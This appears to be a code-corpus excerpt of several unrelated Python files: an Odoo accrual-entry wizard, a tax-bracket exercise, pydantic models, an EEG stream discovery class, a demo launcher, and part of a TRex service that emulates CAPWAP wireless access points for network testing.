account_types_allowed = self.env.ref('account.data_account_type_expenses') + self.env.ref('account.data_account_type_revenue') + self.env.ref('account.data_account_type_other_income')
if active_move_line_ids[0].account_id.user_type_id not in account_types_allowed:
raise UserError(_('You can only change the period for items in these types of accounts: ') + ", ".join(account_types_allowed.mapped('name')))
rec['account_type'] = active_move_line_ids[0].account_id.user_type_id.internal_group
return rec
def amend_entries(self):
# set the accrual account on the selected journal items
accrual_account = self.revenue_accrual_account if self.account_type == 'income' else self.expense_accrual_account
# Generate journal entries.
move_data = {}
for aml in self.active_move_line_ids:
ref1 = _('Accrual Adjusting Entry (%s%% recognized) for invoice: %s') % (self.percentage, aml.move_id.name)
ref2 = _('Accrual Adjusting Entry (%s%% recognized) for invoice: %s') % (100 - self.percentage, aml.move_id.name)
move_data.setdefault(aml.move_id, (
[
# Values to create moves.
{
'date': self.date,
'ref': ref1,
'journal_id': self.journal_id.id,
'line_ids': [],
},
{
'date': aml.move_id.date,
'ref': ref2,
'journal_id': self.journal_id.id,
'line_ids': [],
},
], [
# Messages to log on the chatter.
(_('Accrual Adjusting Entry ({percent}% recognized) for invoice:') + ' <a href=# data-oe-model=account.move data-oe-id={id}>{name}</a>').format(
percent=self.percentage,
id=aml.move_id.id,
name=aml.move_id.name,
),
(_('Accrual Adjusting Entry ({percent}% recognized) for invoice:') + ' <a href=# data-oe-model=account.move data-oe-id={id}>{name}</a>').format(
percent=100 - self.percentage,
id=aml.move_id.id,
name=aml.move_id.name,
),
(_('Accrual Adjusting Entries ({percent}%% recognized) have been created for this invoice on {date}') + ' <a href=# data-oe-model=account.move data-oe-id=%(first_id)d>%(first_name)s</a> and <a href=# data-oe-model=account.move data-oe-id=%(second_id)d>%(second_name)s</a>').format(
percent=self.percentage,
date=format_date(self.env, self.date),
),
]
))
reported_debit = aml.company_id.currency_id.round((self.percentage / 100) * aml.debit)
reported_credit = aml.company_id.currency_id.round((self.percentage / 100) * aml.credit)
if aml.currency_id:
reported_amount_currency = aml.currency_id.round((self.percentage / 100) * aml.amount_currency)
else:
reported_amount_currency = 0.0
move_data[aml.move_id][0][0]['line_ids'] += [
(0, 0, {
'name': aml.name,
'debit': reported_debit,
'credit': reported_credit,
'amount_currency': reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': aml.account_id.id,
'partner_id': aml.partner_id.id,
}),
(0, 0, {
'name': ref1,
'debit': reported_credit,
'credit': reported_debit,
'amount_currency': -reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': accrual_account.id,
'partner_id': aml.partner_id.id,
}),
]
move_data[aml.move_id][0][1]['line_ids'] += [
(0, 0, {
'name': aml.name,
'debit': reported_credit,
'credit': reported_debit,
'amount_currency': -reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': aml.account_id.id,
'partner_id': aml.partner_id.id,
}),
(0, 0, {
'name': ref2,
'debit': reported_debit,
'credit': reported_credit,
'amount_currency': reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': accrual_account.id,
'partner_id': aml.partner_id.id,
}),
]
move_vals = []
log_messages = []
for v in move_data.values():
move_vals += v[0]
log_messages += v[1]
created_moves = self.env['account.move'].create(move_vals)
created_moves.post()
# Reconcile.
index = 0
for move in self.active_move_line_ids.mapped('move_id'):
accrual_moves = created_moves[index:index + 2]
to_reconcile = accrual_moves.mapped('line_ids').filtered(lambda line: line.account_id == accrual_account)
to_reconcile.reconcile()
move.message_post(body=log_messages[index//2 + 2] % {
'first_id': accrual_moves[0].id,
'first_name': accrual_moves[0].name,
'second_id': accrual_moves[1].id,
'second_name': accrual_moves[1].name,
})
accrual_moves[0].message_post(body=log_messages[index//2 + 0])
accrual_moves[1].message_post(body=log_messages[index//2 + 1])
index += 2
# open the generated entries
action = {
'name': _('Generated Entries'),
'domain': [('id', 'in', created_moves.ids)],
'res_model': 'account.move',
'view_mode': 'tree,form',
'type': 'ir.actions.act_window',
'views': [(self.env.ref('account.view_move_tree').id, 'tree'), (False, 'form')],
}
if len(created_moves) == 1:
action.update({'view_mode': 'form', 'res_id': created_moves.id})
return action
| StarcoderdataPython |
6426696 | <reponame>AtosNeves/Beecrowd
s = float(input())
if s <= 2000:
print("Isento")
elif 2000.01 <= s <= 3000:
s1 = s - 2000
s2 = s1 * 0.08
print(f"R$ {s2:.2f}")
elif 3000.01 <= s <= 4500:
a = 1000 * 0.08
s1 = s - 3000
s2 = s1 * 0.18
st = s2 + a
print(f"R$ {st:.2f}")
elif s > 4500:
a = 1000 * 0.08
b = 1500 * 0.18
s5 = s - 4500
s6 = s5 * 0.28
stt = a + b + s6
print(f"R$ {stt:.2f}")
| StarcoderdataPython |
3549991 | from datetime import datetime
from uuid import UUID
from pydantic import BaseModel
from app.domain.models.WorkflowMetadata import WorkflowMetadataTypes
class WorkflowMetadata(BaseModel):
"""
Used as the response model for WorkflowMetadata.
"""
id: int
overforingspakke_id: int
workflow_type: WorkflowMetadataTypes
workflow_name: str
workflow_uid: UUID
opprettet: datetime
class Config:
orm_mode = True
| StarcoderdataPython |
11252277 | from datetime import datetime, date
from typing import Optional
from pydantic import BaseModel, validator
class ExchangeItem(BaseModel):
"""
Exchange item to convert from currency to another
attrs:
currency_from: Currency a given amount is exchanged from
currency_to: Currency to which a given amount is exchanged
amount: Amount to be exchanged
historic_date: Date for which to make currency exchange is to be made
"""
currency_from: str
currency_to: str
amount: float
historic_date: Optional[date] = None
@validator("historic_date", pre=True)
def ensure_date_format(cls, value):
if value:
return datetime.strptime(value, "%Y-%m-%d").date()
| StarcoderdataPython |
376904 | """
Discovery Module for LSL stream discovery and data retrieval
"""
import logging
from threading import current_thread, Thread
from pylsl import resolve_bypred, LostError, TimeoutError, resolve_streams
from .stream import Stream
class Discovery:
"""
Class representing the available LSL stream information and incoming data
"""
def __init__(self, **options):
"""
:param options: additional arguments for creating Stream object
"""
self.logger = logging.getLogger(__name__)
self.options = options
self.sample_rate = None
self.channel_count = None
self.streams_by_uid = {}
self.running = False
self.thread = None
def start(self):
"""
Start the thread to resolve LSL streams
"""
if self.thread:
return False
self.thread = Thread(target=self._refresh, daemon=True, name="Discovery")
self.running = True
self.thread.start()
return True
def stop(self):
"""
Stop LSL stream search
"""
if not self.thread:
return True
self.running = False
if current_thread() is not self.thread:
self.thread.join()
self.thread = None
return True
def streams(self):
"""
:return: a list of Stream objects
"""
return list(self.streams_by_uid.values())
def _refresh(self):
while self.running:
self._resolve()
def _resolve(self):
"""
Search for available EEG streams on LSL and connect to them by saving them as Stream objects
"""
# resolve EEG streams and retrieve their information
streams_info = resolve_bypred("type='EEG'", 0, 2.5)
streams_active = []
self.logger.debug("Found {} available streams".format(len(streams_info)))
# iterate for each stream
for stream_info in streams_info:
# uid = stream_info.source_id() if stream_info.source_id() else stream_info.uid() # retrieve 'source_id'
uid = stream_info.source_id() + ' | ' +stream_info.uid()
streams_active.append(uid)
# if the current stream has not been saved, then connect to the current stream
if uid not in self.streams_by_uid:
if self._validate_stream_signature(stream_info):
self._connect_to(uid, stream_info)
# if the current stream is already saved, but is not running, then disconnect
if uid in self.streams_by_uid:
if self.streams_by_uid[uid].running == False:
self._disconnect_from({uid})
self._disconnect_from(list(set(self.streams_by_uid.keys()) - set(streams_active)))
def _validate_stream_signature(self, stream_info):
"""
checking if the input stream's sampling rate and channel count match those of the previous stream
:param stream_info: current stream information
"""
if self.sample_rate and self.sample_rate != stream_info.nominal_srate():
return False
if self.channel_count and self.channel_count != stream_info.channel_count():
return False
return True
def _connect_to(self, uid, stream_info):
"""
Connect to the stream using the stream information
:param uid: the stream ID, i.e., 'source_id'
:param stream_info: stream information
"""
stream = None
try:
self.logger.info("{}: Discovered at {}hz with {} channels, connecting".format(stream_info.name(), stream_info.nominal_srate(), stream_info.channel_count()))
# create the Stream object using retrieved stream information
stream = Stream(uid, stream_info, **self.options)
stream.start() # start the Stream thread
self.logger.warning("{}: Connected".format(stream_info.name()))
except (LostError, TimeoutError):
self.logger.warning("{}: Could not connect".format(stream_info.name()))
if stream:
if len(self.streams_by_uid) == 0:
self.sample_rate = stream.sample_rate
self.channel_count = stream.channel_count
self.logger.info("{}: Elected master stream at {}hz with {} channels".format(stream.name, stream.sample_rate, stream.channel_count))
self.streams_by_uid[uid] = stream
def _disconnect_from(self, inactive_uids):
"""
Disconnect from streams using their IDs
:param inactive_uids: inactive streams' IDs
"""
for uid in inactive_uids:
if self.streams_by_uid[uid].running:
self.logger.info("{}: Disconnected, killing thread".format(self.streams_by_uid[uid].name))
self.streams_by_uid[uid].stop()
else:
self.logger.info("{}: Killed, cleaning up".format(self.streams_by_uid[uid].name))
del self.streams_by_uid[uid]
if len(self.streams_by_uid) == 0:
self.sample_rate = None
self.channel_count = None
| StarcoderdataPython |
9799609 | <reponame>yuehaowang/pylash_engine<filename>run.py
'''
This is a script tool for running demo and examples made with pylash.
With this tool, you can run demo and examples without installing pylash.
'''
import runpy, sys, os
__author__ = "<NAME>"
ENTRANCE_FILE = "Main.py"
PYLASH_ROOT_DIR = os.path.dirname(__file__)
AVAILABLE_TARGET_NAME = [
"%s.%s" % (os.path.basename(path), f) \
for path in [os.path.join(PYLASH_ROOT_DIR, "demo"), os.path.join(PYLASH_ROOT_DIR, "examples")] \
for f in os.listdir(path) \
if os.path.isdir(os.path.join(path, f))
]
HELP_TEXT = '''
usage: python run.py TARGET_NAME
Available TARGET_NAME:
%s
''' % ("\n ".join(AVAILABLE_TARGET_NAME))
def main():
if len(sys.argv) <= 1:
print(HELP_TEXT)
return
argv = sys.argv[1:]
target_name = argv[0].strip()
if target_name in AVAILABLE_TARGET_NAME:
pathList = target_name.split(".")
dirPath = os.path.join(PYLASH_ROOT_DIR, *pathList)
entrancePath = os.path.join(dirPath, ENTRANCE_FILE)
if not os.path.isdir(dirPath) or not os.path.isfile(entrancePath):
print(HELP_TEXT)
else:
os.chdir(dirPath)
sys.path.insert(0, PYLASH_ROOT_DIR)
runpy.run_path(ENTRANCE_FILE, run_name = "__main__")
else:
print(HELP_TEXT)
main()
| StarcoderdataPython |
22964 | # coding=utf-8
# init
| StarcoderdataPython |
9623364 | <filename>scripts/automation/trex_control_plane/interactive/trex/common/services/trex_service_ap.py
from trex.stl.api import *
from trex.utils.text_opts import *
from trex.utils.common import natural_sorted_key
from .trex_service import Service, ServiceFilter
from .trex_service_int import ServiceCtx, simpy, TXBuffer
import time
from collections import deque
from scapy.all import *
from scapy.contrib.capwap import *
from trex_openssl import *
import threading
import struct
import sys
import time
import base64
'''
FSMs for AP:
* Discover WLC
* Establish DTLS session
* Join WLC
* Add client (station)
* Shutdown DTLS session
* Maintenance (arp, ping, capwap echo request, fetches rx and dispatches to rx_buffer of APs)
'''
class ServiceBufferedCtx(ServiceCtx):
''' Same as parent, but does not use capture to get packets, uses AP's rx_buffer '''
def _run(self, services):
self._reset()
self._add(services)
if len(self.filters) > 1:
raise Exception('Services here should have one common filter per AP')
self.filter = list(self.filters.values())[0]['inst']
if not hasattr(self.filter, 'services_per_ap'):
raise Exception('Services here should have filter with attribute services_per_ap, got %s, type: %s' % (self.filter, type(self.filter)))
# create an environment
self.env = simpy.rt.RealtimeEnvironment(factor = 1, strict = False)
self.tx_buffer = TXBuffer(self.env, self.client, self.port, 99, 1)
# create processes
for service in self.services:
pipe = self._pipe()
self.services[service]['pipe'] = pipe
p = self.env.process(service.run(pipe))
self._on_process_create(p)
try:
tick_process = self.env.process(self._tick_process())
self.env.run(until = tick_process)
finally:
self._reset()
def _tick_process (self):
while True:
self.tx_buffer.send_all()
for ap, services in self.filter.services_per_ap.items():
for _ in range(len(ap.rx_buffer)):
try:
scapy_pkt = ap.rx_buffer.popleft()
except IndexError:
break
for service in services:
self.services[service]['pipe']._on_rx_pkt(scapy_pkt, None)
# if no other process exists - exit
if self.is_done():
return
else:
# backoff
yield self.env.timeout(0.05)
'''
Just assign services to AP, it will get packets from AP's rx_buffer
'''
class ServiceFilterPerAp(ServiceFilter):
def __init__(self):
self.services_per_ap = {}
def add(self, service):
if service.ap in self.services_per_ap:
self.services_per_ap[service.ap].append(service)
else:
self.services_per_ap[service.ap] = [service]
'''
Used to fetch RX packets for all APs
Decrypts them if possible
Sends echo request (control keep alive)
Answers to async config changes
Does not use SimPy
'''
class ServiceApBgMaintenance:
bpf_filter = ('arp or (ip and (icmp or udp src port 5246 or ' # arp, ping, capwap control
+ '(udp src port 5247 and (udp[11] & 8 == 8 or ' # capwap data keep-alive
+ 'udp[16:2] == 16 or ' # client assoc. resp
+ 'udp[48:2] == 2054 or ' # client arp
+ '(udp[48:2] == 2048 and udp[59] == 1)))))') # client ping
ARP_ETHTYPE = b'\x08\x06'
IP_ETHTYPE = b'\x08\x00'
ICMP_PROTO = b'\x01'
UDP_PROTO = b'\x11'
CAPWAP_CTRL_PORT = b'\x14\x7e'
CAPWAP_DATA_PORT = b'\x14\x7f'
WLAN_ASSOC_RESP = b'\x00\x10'
ARP_REQ = b'\x00\x01'
ARP_REP = b'\x00\x02'
ICMP_REQ = b'\x08'
def __init__(self, ap_mngr, port_id):
self.ap_mngr = ap_mngr
self.port_id = port_id
self.ap_per_ip = {}
self.client_per_mac = {}
self.client_per_ip = {}
self.bg_client = self.ap_mngr.bg_client
self.port = self.bg_client.ports[port_id]
self.capture_id = None
self.bg_thread = None
self.send_pkts = []
################
# API #
################
def run(self):
self.bg_thread = threading.Thread(target = self.main_loop_wrapper)
self.bg_thread.name = 'BG Thread (port %s)' % self.port_id
self.bg_thread.daemon = True
self.bg_thread.start()
def is_running(self):
return self.bg_thread and self.bg_thread.is_alive()
def stop(self):
capture_id = self.capture_id
self.capture_id = None
try:
self.bg_client.stop_capture(capture_id)
except:
pass
##################
# INTERNAL #
##################
def AP_ARP_RESP_TEMPLATE(self, src_mac, dst_mac, src_ip, dst_ip):
return (
dst_mac + src_mac + self.ARP_ETHTYPE + # Ethernet
b'\x00\x01\x08\x00\x06\x04\x00\x02' + src_mac + src_ip + dst_mac + dst_ip # ARP
)
def log(self, msg, level = Logger.VERBOSES['warning']):
if not msg.startswith('(WLC) '):
msg = '(WLC) %s' % msg
self.ap_mngr.trex_client.logger.async_log('\n' + bold(msg), level)
def err(self, msg):
self.log(msg, Logger.VERBOSES['error'])
def fatal(self, msg):
self.log(msg, Logger.VERBOSES['critical'])
self.stop()
def send(self, pkts):
assert type(pkts) is list
push_pkts = [{'binary': base64.b64encode(bytes(p) if isinstance(p, Ether) else p).decode(),
'use_port_dst_mac': False,
'use_port_src_mac': False} for p in pkts]
rc = self.port.push_packets(push_pkts, False, ipg_usec = 1)
#if not rc:
# self.err(rc.err())
def recv(self):
pkts = []
self.bg_client.fetch_capture_packets(self.capture_id, pkts, 10000)
if len(pkts) > 9995:
self.err('Too much packets in rx queue (%s)' % len(pkts))
return pkts
def shutdown_ap(self, ap):
try:
for client in ap.clients:
client.disconnect()
if ap.is_dtls_established:
with ap.ssl_lock:
libssl.SSL_shutdown(ap.ssl)
tx_pkt = ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.ssl_read())
self.send([tx_pkt])
finally:
ap.reset_vars()
def main_loop_wrapper(self):
err_msg = ''
self.capture_id = self.bg_client.start_capture(rx_ports = self.port_id, bpf_filter = self.bpf_filter, limit = 10000)['id']
try:
#with Profiler_Context(20):
self.main_loop()
except KeyboardInterrupt:
pass
except Exception as e:
if self.capture_id: # if no id -> got stop()
if not isinstance(e, STLError):
import traceback
traceback.print_exc()
err_msg = ' (Exception: %s)' % e
finally:
if not self.capture_id:
return
try:
self.bg_client.stop_capture(self.capture_id)
except:
pass
if self.port_id in self.ap_mngr.service_ctx:
if self.ap_per_ip:
self.err('Background thread on port %s died%s. Disconnecting APs.' % (self.port_id, err_msg))
else:
self.err('Background thread on port %s died%s.' % (self.port_id, err_msg))
for ap in self.ap_per_ip.values():
self.shutdown_ap(ap)
def handle_ap_arp(self, rx_bytes):
src_ip = rx_bytes[28:32]
dst_ip = rx_bytes[38:42]
if src_ip == dst_ip: # GARP
return
if dst_ip not in self.ap_per_ip: # check IP
return
ap = self.ap_per_ip[dst_ip]
src_mac = rx_bytes[6:12]
dst_mac = rx_bytes[:6]
if dst_mac not in (b'\xff\xff\xff\xff\xff\xff', ap.mac_bytes): # check MAC
ap.err('Bad MAC (%s) of AP %s' % (str2mac(dst_mac), ap.name))
return
if ap.is_debug:
ap.debug('AP %s got ARP' % ap.name)
Ether(rx_bytes).show2()
if rx_bytes[20:22] == self.ARP_REQ: # 'who-has'
tx_pkt = self.AP_ARP_RESP_TEMPLATE(
src_mac = ap.mac_bytes,
dst_mac = src_mac,
src_ip = dst_ip,
dst_ip = src_ip,
)
#Ether(tx_pkt).show2()
self.send_pkts.append(tx_pkt)
elif rx_bytes[20:22] == self.ARP_REP: # 'is-at'
# ap.rx_buffer.append(Ether(rx_bytes))
if src_ip == ap.wlc_ip_bytes:
ap.mac_dst_bytes = src_mac
ap.mac_dst = str2mac(src_mac)
def handle_ap_icmp(self, rx_bytes, ap):
rx_pkt = Ether(rx_bytes)
icmp_pkt = rx_pkt[ICMP]
if icmp_pkt.type == 8: # echo-request
#print 'Ping to AP!'
#rx_pkt.show2()
if rx_pkt[IP].dst == ap.ip: # ping to AP
tx_pkt = rx_pkt.copy()
tx_pkt.src, tx_pkt.dst = tx_pkt.dst, tx_pkt.src
tx_pkt[IP].src, tx_pkt[IP].dst = tx_pkt[IP].dst, tx_pkt[IP].src
tx_pkt[ICMP].type = 'echo-reply'
del tx_pkt[ICMP].chksum
#tx_pkt.show2()
self.send_pkts.append(tx_pkt)
#elif icmp_pkt.type == 0: # echo-reply
# ap.rx_buffer.append(rx_pkt)
def process_capwap_ctrl(self, rx_bytes, ap):
ap.info('Got CAPWAP CTRL at AP %s' % ap.name)
if ap.is_debug:
rx_pkt = Ether(rx_bytes)
rx_pkt.show2()
rx_pkt.dump_offsets_tree()
if not ap.is_dtls_established:
if rx_bytes[42:43] == b'\0': # discovery response
capwap_bytes = rx_bytes[42:]
capwap_hlen = (struct.unpack('!B', capwap_bytes[1:2])[0] & 0b11111000) >> 1
ctrl_header_type = struct.unpack('!B', capwap_bytes[capwap_hlen+3:capwap_hlen+4])[0]
if ctrl_header_type != 2:
return
ap.mac_dst_bytes = rx_bytes[6:12]
ap.mac_dst = str2mac(ap.mac_dst_bytes)
ap.wlc_ip_bytes = rx_bytes[26:30]
ap.ip_dst = str2ip(ap.wlc_ip_bytes)
result_code = CAPWAP_PKTS.parse_message_elements(capwap_bytes, capwap_hlen, ap, self.ap_mngr)
ap.rx_responses[2] = result_code
elif rx_bytes[42:43] == b'\1': # dtls handshake
ap.rx_buffer.append(rx_bytes)
return
is_dtls = struct.unpack('?', rx_bytes[42:43])[0]
if not is_dtls: # dtls is established, ctrl should be encrypted
return
if (rx_bytes[46:47] == b'\x15'): # DTLS alert
ap.is_dtls_closed = True
ap.is_connected = False
self.err("Server sent DTLS alert to AP '%s'." % ap.name)
rx_pkt_buf = ap.decrypt(rx_bytes[46:])
if not rx_pkt_buf:
return
if rx_pkt_buf[0:1] not in (b'\0', b'\1'): # definitely not CAPWAP... should we debug it?
ap.debug('Not CAPWAP, skipping: %s' % hex(rx_pkt_buf))
return
#rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
ap.last_recv_ts = time.time()
if ap.is_debug:
rx_pkt.show2()
capwap_assemble = ap.capwap_assemble
if struct.unpack('!B', rx_pkt_buf[3:4])[0] & 0x80: # is_fragment
rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
if capwap_assemble:
assert ap.capwap_assemble['header'].fragment_id == rx_pkt.header.fragment_id, 'Got CAPWAP fragments with out of order (different fragment ids)'
control_str = bytes(rx_pkt[CAPWAP_Control_Header_Fragment])
if rx_pkt.header.fragment_offset * 8 != len(capwap_assemble['buf']):
self.err('Fragment offset and data length mismatch')
capwap_assemble.clear()
return
#if rx_pkt.header.fragment_offset * 8 > len(capwap_assemble['buf']):
# print('Fragment offset: %s, data so far length: %s (not enough data)' % (rx_pkt.header.fragment_offset, len(capwap_assemble['buf'])))
#elif rx_pkt.header.fragment_offset * 8 < len(capwap_assemble['buf']):
# capwap_assemble['buf'] = capwap_assemble['buf'][:rx_pkt.header.fragment_offset * 8]
capwap_assemble['buf'] += control_str
if rx_pkt.is_last_fragment():
capwap_assemble['assembled'] = CAPWAP_CTRL(
header = capwap_assemble['header'],
control_header = CAPWAP_Control_Header(capwap_assemble['buf'])
)
else:
if rx_pkt.is_last_fragment():
self.err('Got CAPWAP first fragment that is also last fragment!')
return
if rx_pkt.header.fragment_offset != 0:
rx_pkt.show2()
self.err('Got out of order CAPWAP fragment, does not start with zero offset')
return
capwap_assemble['header'] = rx_pkt.header
capwap_assemble['header'].flags &= ~0b11000
capwap_assemble['buf'] = bytes(rx_pkt[CAPWAP_Control_Header_Fragment])
capwap_assemble['ap'] = ap
elif capwap_assemble:
self.err('Got not fragment in middle of assemble of fragments (OOO).')
capwap_assemble.clear()
else:
capwap_assemble['assembled'] = rx_pkt_buf
rx_pkt_buf = capwap_assemble.get('assembled')
if not rx_pkt_buf or rx_pkt_buf[0:1] != b'\0':
return
capwap_assemble.clear()
#rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
#rx_pkt.show2()
#rx_pkt.dump_offsets_tree()
if ap.is_debug:
CAPWAP_CTRL(rx_pkt_buf).show2()
capwap_hlen = (struct.unpack('!B', rx_pkt_buf[1:2])[0] & 0b11111000) >> 1
ctrl_header_type = struct.unpack('!B', rx_pkt_buf[capwap_hlen+3:capwap_hlen+4])[0]
if ctrl_header_type == 7: # Configuration Update Request
#rx_pkt.show2()
CAPWAP_PKTS.parse_message_elements(rx_pkt_buf, capwap_hlen, ap, self.ap_mngr) # get info from incoming packet
seq = struct.unpack('!B', rx_pkt_buf[capwap_hlen+4:capwap_hlen+5])[0]
tx_pkt = ap.get_config_update_capwap(seq)
if ap.is_debug:
CAPWAP_CTRL(tx_pkt.value).show2()
self.send_pkts.append(ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.encrypt(tx_pkt)))
elif ctrl_header_type == 14: # Echo Response
ap.echo_resp_timer = None
elif ctrl_header_type == 17: # Reset Request
self.err('AP %s got Reset request, shutting down' % ap.name)
#self.send_pkts.append(ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.encrypt(tx_pkt)))
self.shutdown_ap(ap)
elif ctrl_header_type in (4, 6, 12):
result_code = CAPWAP_PKTS.parse_message_elements(rx_pkt_buf, capwap_hlen, ap, self.ap_mngr)
ap.rx_responses[ctrl_header_type] = result_code
else:
rx_pkt.show2()
ap.err('Got unhandled capwap header type: %s' % ctrl_header_type)
def handle_client_arp(self, dot11_bytes, ap):
ip = dot11_bytes[58:62]
client = self.client_per_ip.get(ip)
if not client:
return
if client.ap is not ap:
self.err('Got ARP to client %s via wrong AP (%s)' % (client.ip, ap.name))
return
if dot11_bytes[40:42] == self.ARP_REQ: # 'who-has'
if dot11_bytes[48:52] == dot11_bytes[58:62]: # GARP
return
tx_pkt = ap.wrap_pkt_by_wlan(client, ap.get_arp_pkt('is-at', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes))
self.send_pkts.append(tx_pkt)
elif dot11_bytes[40:42] == self.ARP_REP: # 'is-at'
client.seen_arp_reply = True
def handle_client_icmp(self, dot11_bytes, ap):
ip = dot11_bytes[50:54]
client = self.client_per_ip.get(ip)
if not client:
return
if client.ap is not ap:
self.err('Got ARP to client %s via wrong AP (%s)' % (client.ip, ap.name))
return
if dot11_bytes[54:55] == self.ICMP_REQ:
rx_pkt = Dot11_swapped(dot11_bytes)
tx_pkt = Ether(src = client.mac, dst = rx_pkt.addr3) / rx_pkt[IP].copy()
tx_pkt[IP].src, tx_pkt[IP].dst = tx_pkt[IP].dst, tx_pkt[IP].src
tx_pkt[ICMP].type = 'echo-reply'
del tx_pkt[ICMP].chksum
self.send_pkts.append(ap.wrap_pkt_by_wlan(client, bytes(tx_pkt)))
def main_loop(self):
echo_send_timer = PassiveTimer(1)
self.send_pkts = []
while self.capture_id:
now_time = time.time()
self.send(self.send_pkts)
self.send_pkts = []
resps = self.recv()
try:
if not self.ap_mngr.service_ctx[self.port_id]['synced']: # update only if required
with self.ap_mngr.bg_lock:
aps = list(self.ap_mngr.aps)
clients = list(self.ap_mngr.clients)
self.ap_mngr.service_ctx[self.port_id]['synced'] = True
self.ap_per_ip = dict([(ap.ip_bytes, ap) for ap in aps if ap.port_id == self.port_id])
self.client_per_mac = dict([(client.mac_bytes, client) for client in clients])
self.client_per_ip = dict([(client.ip_bytes, client) for client in clients])
except KeyError as e:
if self.port_id not in self.ap_mngr.service_ctx:
return
if echo_send_timer.has_expired():
echo_send_timer = PassiveTimer(0.5)
for ap in self.ap_per_ip.values():
if ap.is_connected:
if ap.echo_resp_timer and ap.echo_resp_timer.has_expired(): # retry echo
if ap.echo_resp_retry > 0:
ap.echo_resp_timeout *= 2
ap.echo_resp_timer = PassiveTimer(ap.echo_resp_timeout)
ap.echo_resp_retry -= 1
tx_pkt = ap.get_echo_capwap()
self.send_pkts.append(ap.get_echo_wrap(ap.encrypt(tx_pkt)))
else:
self.err("Timeout in echo response for AP '%s', disconnecting" % ap.name)
self.shutdown_ap(ap)
for ap in self.ap_per_ip.values():
if ap.is_connected:
if time.time() > ap.last_echo_req_ts + ap.echo_req_interval: # new echoes
tx_pkt = ap.get_echo_capwap()
ap.last_echo_req_ts = time.time()
ap.echo_resp_timeout = ap.capwap_RetransmitInterval
ap.echo_resp_timer = PassiveTimer(ap.echo_resp_timeout)
ap.echo_resp_retry = ap.capwap_MaxRetransmit
self.send_pkts.append(ap.get_echo_wrap(ap.encrypt(tx_pkt)))
if len(self.send_pkts) > 200:
break
if not resps and not self.send_pkts:
time.sleep(0.01)
continue
for resp in resps:
if not self.capture_id:
return
rx_bytes = resp['binary']
dst_mac = rx_bytes[:7]
ether_type = rx_bytes[12:14]
if ether_type == self.ARP_ETHTYPE:
self.handle_ap_arp(rx_bytes)
elif ether_type == self.IP_ETHTYPE:
ip = rx_bytes[30:34]
if ip not in self.ap_per_ip: # check IP
continue
ap = self.ap_per_ip[ip]
dst_mac = rx_bytes[:6]
if dst_mac not in ('\xff\xff\xff\xff\xff\xff', ap.mac_bytes): # check MAC
ap.err('Bad MAC (%s), although IP of AP (%s)' % (str2mac(dst_mac), str2ip(ip)))
continue
ip_proto = rx_bytes[23:24]
if ip_proto == self.ICMP_PROTO:
self.handle_ap_icmp(rx_bytes, ap)
elif ip_proto == self.UDP_PROTO:
udp_port_str = rx_bytes[36:38]
if udp_port_str != ap.udp_port_str: # check UDP port
ap.err('Bad UDP port (%s), although IP of AP (%s)' % (str2int(udp_port), str2ip(ip)))
continue
udp_src = rx_bytes[34:36]
if udp_src == self.CAPWAP_CTRL_PORT:
self.process_capwap_ctrl(rx_bytes, ap)
elif udp_src == self.CAPWAP_DATA_PORT:
if ord(rx_bytes[45:46]) & 0b1000: # CAPWAP Data Keep-alive
ap.got_keep_alive = True
continue
dot11_offset = 42 + ((ord(rx_bytes[43:44]) & 0b11111000) >> 1)
dot11_bytes = rx_bytes[dot11_offset:]
#Dot11_swapped(dot11_bytes).dump_offsets_tree()
if dot11_bytes[:2] == self.WLAN_ASSOC_RESP: # Client assoc. response
mac_bytes = dot11_bytes[4:10]
client = self.client_per_mac.get(mac_bytes)
if client:
client.is_associated = True
elif dot11_bytes[32:34] == self.ARP_ETHTYPE:
self.handle_client_arp(dot11_bytes, ap)
elif dot11_bytes[32:34] == self.IP_ETHTYPE and dot11_bytes[43:44] == self.ICMP_PROTO:
self.handle_client_icmp(dot11_bytes, ap)
class ServiceAp(Service):
requires_dtls = True
def __init__(self, ap, verbose_level = Service.WARN):
Service.__init__(self, verbose_level)
self.ap = ap
self.name = '%s of %s' % (self.__class__.__name__, ap.name)
def get_filter_type(self):
return ServiceFilterPerAp
def timeout(self):
self.ap.warn('Timeout in FSM %s' % self.name)
def log(self, msg):
self.ap.info(msg)
def err(self, msg):
self.ap.err('Error in FSM %s: %s' % (self.name, msg))
def run(self, pipe):
if self.requires_dtls and not self.ap.is_dtls_established:
self.err('DTLS is not established for AP %s' % self.ap.name)
return
self.ap.info('Starting FSM %s' % self.name)
run_gen = self.run_with_buffer()
send_data = None
while True:
if self.requires_dtls and not self.ap.is_dtls_established:
self.log('DTLS session got closed for AP %s, exiting FSM' % self.ap.name)
break
try:
action = run_gen.send(send_data)
except StopIteration:
action = 'done'
if type(action) is tuple and len(action) == 2:
action, val = action
if action == 'get':
send_data = None
resp = yield pipe.async_wait_for_pkt(time_sec = val, limit = 1)
if resp:
send_data = resp[0]['pkt']
elif action == 'put':
if type(val) is list:
for v in val:
pipe.async_tx_pkt(PacketBuffer(v))
else:
pipe.async_tx_pkt(PacketBuffer(val))
elif action == 'sleep':
yield pipe.async_wait(val)
elif action == 'done':
self.log('Finished successfully FSM %s' % self.name)
break
elif action == 'err':
self.err(val)
break
elif action == 'time':
self.timeout()
break
else:
raise Exception('Incorrect action in FSM %s: %s' % (self.name, action))
def hex(buf, delimiter = ' '):
if not buf:
return 'Empty buffer'
return delimiter.join(['%02x' % (c if type(c) is int else ord(c)) for c in buf])
################ FSMs ##################
class ServiceApDiscoverWLC(ServiceAp):
requires_dtls = False
def run_with_buffer(self):
# First resolve WLC MAC if needed
if self.ap.wlc_ip_bytes and not self.ap.mac_dst_bytes:
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if self.ap.mac_dst_bytes:
break
RetransmitInterval *= 2
arp = self.ap.get_arp_pkt('who-has', src_mac_bytes=self.ap.mac_bytes, src_ip_bytes=self.ap.ip_bytes)
yield ('put', arp)
timer = PassiveTimer(RetransmitInterval)
